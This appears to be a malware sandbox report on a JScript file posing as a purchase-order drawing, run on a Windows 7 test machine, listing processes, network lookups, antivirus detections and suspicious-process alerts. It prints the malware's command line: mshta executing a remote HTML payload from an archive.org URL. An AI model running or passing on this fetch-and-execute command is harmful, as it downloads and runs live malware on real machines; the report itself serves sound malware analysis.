Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6401 | Jan. 8, 2025, 12:31 p.m. | Jan. 8, 2025, 12:33 p.m. |
-
wscript.exe "C:\Windows\System32\wscript.exe" "C:\Users\test22\AppData\Local\Temp\New PO 3D Step drawings.jse"
2552-
mshta.exe "C:\Windows\System32\mshta.exe" https://ia902208.us.archive.org/35/items/monaonao/1.html
2864
-
Name | Response | Post-Analysis Lookup |
---|---|---|
ia902208.us.archive.org | 207.241.228.68 |
IP Address | Status | Action |
---|---|---|
164.124.101.2 | Active | Moloch |
Suricata Alerts
No Suricata Alerts
Suricata TLS
No Suricata TLS
cmdline | "C:\Windows\System32\mshta.exe" https://ia902208.us.archive.org/35/items/monaonao/1.html |
cmdline | mshta https://ia902208.us.archive.org/35/items/monaonao/1.html |
Symantec | CL.Downloader!gen87 |
NANO-Antivirus | Riskware.Script.Obfuscated.kcdfgx |
TrendMicro | HEUR_JS.WCO |
parent_process | wscript.exe | martian_process | "C:\Windows\System32\mshta.exe" https://ia902208.us.archive.org/35/items/monaonao/1.html | ||||||
parent_process | wscript.exe | martian_process | mshta https://ia902208.us.archive.org/35/items/monaonao/1.html |
file | C:\Windows\System32\mshta.exe |